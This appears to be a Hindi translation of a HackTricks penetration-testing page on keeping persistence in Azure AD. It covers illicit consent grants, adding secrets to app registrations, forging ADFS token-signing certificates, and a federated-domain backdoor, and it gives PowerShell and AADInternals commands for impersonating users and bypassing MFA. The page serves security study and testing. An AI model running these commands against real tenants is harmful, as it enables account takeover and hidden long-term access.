Az - Persistence

हैकट्रिक्स का समर्थन करें

अवैध सहमति अनुदान

डिफ़ॉल्ट रूप से, कोई भी उपयोगकर्ता Azure AD में एक एप्लिकेशन पंजीकृत कर सकता है। इसलिए आप एक एप्लिकेशन को पंजीकृत कर सकते हैं (केवल लक्षित टेनेंट के लिए) जिसे व्यवस्थापक सहमति के साथ उच्च प्रभाव अनुमतियाँ चाहिए (यदि आप व्यवस्थापक हैं तो इसे मंजूर करें) - जैसे किसी उपयोगकर्ता की ओर से मेल भेजना, भूमिका प्रबंधन आदि। यह हमें फिशिंग हमले को सफलतापूर्वक करने की अनुमति देगा।

इसके अतिरिक्त, आप उस एप्लिकेशन को भी अपने उपयोगकर्ता के रूप में स्वीकार कर सकते हैं ताकि आप उस पर पहुंच बनाए रख सकें।

एप्लिकेशन और सेवा प्रिंसिपल्स

एप्लिकेशन प्रशासक, GA या microsoft.directory/applications/credentials/update अनुमतियों के साथ एक कस्टम भूमिका के साथ, हम किसी मौजूदा एप्लिकेशन में क्रेडेंशियल (सीक्रेट या सर्टिफिकेट) जोड़ सकते हैं।

यह संभव है उच्च अनुमतियों वाले एप्लिकेशन को लक्षित करना या उच्च अनुमतियों वाला नया एप्लिकेशन जोड़ना

एप्लिकेशन में जोड़ने के लिए एक दिलचस्प भूमिका होगी विशेषाधिकारित प्रमाणीकरण प्रबंधक भूमिका क्योंकि यह ग्लोबल प्रशासकों का पासवर्ड रीसेट करने की अनुमति देता है।

यह तकनीक भी MFA को छलना देती है।

$passwd = ConvertTo-SecureString "J~Q~QMt_qe4uDzg53MDD_jrj_Q3P.changed" -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential("311bf843-cc8b-459c-be24-6ed908458623", $passwd)
Connect-AzAccount -ServicePrincipal -Credential $credentials -Tenant e12984235-1035-452e-bd32-ab4d72639a
  • प्रमाणपत्र आधारित प्रमाणीकरण के लिए

Connect-AzAccount -ServicePrincipal -Tenant <TenantId> -CertificateThumbprint <Thumbprint> -ApplicationId <ApplicationId>

संघ - टोकन हस्ताक्षर प्रमाणपत्र

DA विशेषाधिकार के साथ on-prem AD पर, नए टोकन हस्ताक्षर और टोकन डिक्रिप्ट प्रमाणपत्र बनाना और आयात करना संभव है जिनकी बहुत लंबी वैधता हो। यह हमें उन उपयोगकर्ता के रूप में लॉग-इन करने की अनुमति देगा जिनका ImuutableID हमें पता है।

नीचे दिए गए कमांड को ADFS सर्वर पर DA के रूप में चलाएं नए प्रमाणपत्र बनाने के लिए (डिफ़ॉल्ट पासवर्ड 'AADInternals'), उन्हें ADFS में जोड़ें, स्वचालित रोलवर को अक्षम करें और सेवा को पुनः आरंभ करें:

New-AADIntADFSSelfSignedCertificates

फिर, Azure AD के साथ प्रमाणपत्र सूचना को अपडेट करें:

Update-AADIntADFSFederationSettings -Domain cyberranges.io

संघ - विश्वसनीय डोमेन

एक किरायेदार पर जीए प्रिविलेज के साथ, एक नए डोमेन जोड़ना संभव है (सत्यापित होना चाहिए), इसकी प्रमाणीकरण प्रकार को संघीय बनाना और डोमेन को एक विशिष्ट प्रमाणपत्र (नीचे दिए गए कमांड में कोई भी .sts) और जारीकर्ता पर विश्वास करने के लिए कॉन्फ़िगर करना:

# Using AADInternals
ConvertTo-AADIntBackdoor -DomainName cyberranges.io

# Get ImmutableID of the user that we want to impersonate. Using Msol module
Get-MsolUser | select userPrincipalName,ImmutableID

# Access any cloud app as the user
Open-AADIntOffice365Portal -ImmutableID qIMPTm2Q3kimHgg4KQyveA== -Issuer "http://any.sts/B231A11F" -UseBuiltInCertificate -ByPassMFA$true

संदर्भ

हैकट्रिक्स का समर्थन करें

Last updated